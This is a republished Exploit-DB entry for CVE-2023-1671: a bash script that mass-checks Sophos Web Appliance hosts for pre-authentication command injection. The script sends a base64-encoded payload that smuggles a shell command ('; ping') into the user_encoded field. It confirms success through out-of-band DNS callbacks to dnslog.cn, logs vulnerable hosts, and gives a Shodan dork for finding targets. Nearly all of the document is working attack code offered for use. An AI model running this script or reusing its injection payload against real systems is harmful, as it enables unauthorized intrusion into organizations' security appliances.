Sophos Web Appliance 4.3.10.4 – Pre-auth command injection - 体验盒子

作者： Behnam Abasi Vanda
日期： 2023-04-25
类别：
webapps
平台：
php
来源：https://www.exploit-db.com/exploits/51396/
#!/bin/bash 
# Exploit Title: Sophos Web Appliance 4.3.10.4 - Pre-auth command injection
# Exploit Author: Behnam Abasi Vanda
# Vendor Homepage: https://www.sophos.com
# Version:Sophos Web Appliance older than version 4.3.10.4
# Tested on: Ubuntu
# CVE : CVE-2023-1671
# Shodan Dork: title:"Sophos Web Appliance"
# Reference : https://www.sophos.com/en-us/security-advisories/sophos-sa-20230404-swa-rce
# Reference : https://vulncheck.com/blog/cve-2023-1671-analysis



TARGET_LIST="$1"

# =====================
BOLD="\033[1m"
RED="\e[1;31m"
GREEN="\e[1;32m"
YELLOW="\e[1;33m"
BLUE="\e[1;34m"
NOR="\e[0m"
# ====================


get_new_subdomain()
{
catMN.txt | grep 'YES' >/dev/null;ch=$?
 if [ $ch -eq 0 ];then
		echo -e "	[+] Trying to get Subdomain $NOR"
	 rm -rf cookie.txt
	sub=`curl -i -c cookie.txt -s -k -X $'GET' \
-H $'Host: www.dnslog.cn' -H $'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/112.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Referer: http://www.dnslog.cn/' \
	$'http://www.dnslog.cn/getdomain.php?t=0' | grep dnslog.cn` 
	 echo -e "	[+]$BOLD$GREEN Subdomain : $sub $NOR"
	 fi
}

check_vuln()
{
curl -k --trace-ascii % "https://$1/index.php?c=blocked&action=continue" -d "args_reason=filetypewarn&url=$RANDOM&filetype=$RANDOM&user=$RANDOM&user_encoded=$(echo -n "';ping $sub -c 3 #" | base64)"

req=`curl -i -s -k -b cookie.txt -X $'GET' \
-H $'Host: www.dnslog.cn' -H $'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Referer: http://www.dnslog.cn/' \
 $'http://www.dnslog.cn/getrecords.php?t=0'`
 
echo "$req"| grep 'dnslog.cn' >/dev/null;ch=$?
 if [ $ch -eq 0 ];then
 	echo "YES" > MN.txt
		echo -e "	[+]$BOLD $RED https://$1 Vulnerable :D $NOR"
		echo "https://$1" >> vulnerable.lst			
	else 
 		echo -e "	[-] https://$1 Not Vulnerable :| $NOR"
 		echo "NO" > MN.txt
	 fi
}

echo '

 ██████╗██╗ ██╗███████╗██████╗██████╗ ██████╗ ██████╗██╗ ██████╗███████╗
██╔════╝██║ ██║██╔════╝╚════██╗██╔═████╗╚════██╗╚════██╗███║██╔════╝╚════██║
██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗╚██║███████╗██╔╝
██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝╚═══██╗╚════╝ ██║██╔═══██╗██╔╝ 
╚██████╗ ╚████╔╝ ███████╗███████╗╚██████╔╝███████╗██████╔╝ ██║╚██████╔╝██║
 ╚═════╝╚═══╝╚══════╝╚══════╝ ╚═════╝ ╚══════╝╚═════╝╚═╝ ╚═════╝ ╚═╝

██████╗ ██╗ ██╗██████╗ ███████╗██╗██╗███╗ ██╗ █████╗ ███╗ ███╗ ██╗
██╔══██╗╚██╗ ██╔╝██╔══██╗██╔════╝██║██║████╗██║██╔══██╗████╗ ████║██╗╚██╗ 
██████╔╝ ╚████╔╝ ██████╔╝█████╗███████║██╔██╗ ██║███████║██╔████╔██║╚═╝ ██║ 
██╔══██╗╚██╔╝██╔══██╗██╔══╝██╔══██║██║╚██╗██║██╔══██║██║╚██╔╝██║▄█╗ ██║ 
██████╔╝ ██║ ██████╔╝███████╗██║██║██║ ╚████║██║██║██║ ╚═╝ ██║▀═╝██╔╝ 
╚═════╝╚═╝ ╚═════╝ ╚══════╝╚═╝╚═╝╚═╝╚═══╝╚═╝╚═╝╚═╝ ╚═╝ ╚═╝
 
'
if test "$#" -ne 1; then
echo " ----------------------------------------------------------------"
echo "[!] please give the target list file : bash CVE-2023-1671.sh targets.txt "
echo " ---------------------------------------------------------------"
exit
fi



rm -rf cookie.txt
echo "YES" > MN.txt
for target in `cat $TARGET_LIST`
do

get_new_subdomain;
echo "	[~] Checking $target"
	check_vuln "$target"
done
rm -rf MN.txt
rm -rf cookie.txt